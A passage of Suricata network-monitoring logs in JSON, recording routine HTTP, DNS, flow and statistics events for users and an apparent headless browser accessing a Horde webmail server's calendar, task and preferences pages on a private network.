Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.581795+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31870,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:03:47.769072+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786}} {"timestamp":"2020-02-29T00:03:47.819724+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36714,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.821266+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} 
{"timestamp":"2020-02-29T00:03:47.828479+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:03:47.829099+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:03:47.830450+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":2}} {"timestamp":"2020-02-29T00:03:47.847731+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:03:47.849620+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":3}} 
{"timestamp":"2020-02-29T00:03:47.893299+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} {"timestamp":"2020-02-29T00:03:51.000241+0000","event_type":"stats","stats":{"uptime":13883,"capture":{"kernel_packets":132963,"kernel_drops":0},"decoder":{"pkts":133009,"bytes":92192150,"invalid":180,"ipv4":131576,"ipv6":8,"ethernet":133009,"raw":0,"null":0,"sll":0,"tcp":126542,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"failed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2666,"n
ew_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":7,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74606,"memcap":0}}} {"timestamp":"2020-02-29T00:03:52.000305+0000","flow_id":1433087412423287,"event_type":"flow","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1448,"bytes_toclient":5145,"start":"2020-02-29T00:02:46.215671+0000","end":"2020-02-29T00:02:51.772800+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:52.582941+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} 
{"timestamp":"2020-02-29T00:03:52.854906+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":4}} {"timestamp":"2020-02-29T00:03:58.000296+0000","event_type":"stats","stats":{"uptime":13890,"capture":{"kernel_packets":133011,"kernel_drops":0},"decoder":{"pkts":133021,"bytes":92192846,"invalid":180,"ipv4":131584,"ipv6":8,"ethernet":133021,"raw":0,"null":0,"sll":0,"tcp":126550,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"fail
ed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2667,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":22938,"memcap":0}}} {"timestamp":"2020-02-29T00:03:59.357530+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61359,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:59.641684+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896}} 
{"timestamp":"2020-02-29T00:04:00.084792+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62022,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":11,"tx_id":0}} {"timestamp":"2020-02-29T00:04:02.000622+0000","flow_id":946128316031874,"event_type":"flow","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1037,"bytes_toclient":4130,"start":"2020-02-29T00:02:56.680834+0000","end":"2020-02-29T00:03:01.884783+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:03.000848+0000","flow_id":835593022375949,"event_type":"flow","src_ip":"192.168.10.122","src_port":51967,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:02.231437+0000","end":"2020-02-28T23:59:02.339962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:04.646765+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35873,"tx_id":0}} {"timestamp":"2020-02-29T00:04:05.000201+0000","event_type":"stats","stats":{"uptime":13897,"capture":{"kernel_packets":133045,"kernel_drops":0},"decoder":{"pkts":133051,"bytes":92203990,"invalid":180,"ipv4":131614,"ipv6":8,"ethernet":133051,"raw":0,"null":0,"sll":0,"tcp":126576,"udp":4844,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2689,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2705,"synack":2696,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1733,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2208
,"failed_udp":108},"tx":{"http":4500,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2285}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":108597,"memcap":0}}} {"timestamp":"2020-02-29T00:04:05.216190+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:04:06.676109+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32616,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:06.871373+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286}} {"timestamp":"2020-02-29T00:04:09.268672+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49249,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:04:09.585969+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128}} {"timestamp":"2020-02-29T00:04:10.571181+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:10.577609+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42246,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:10.775587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207}} 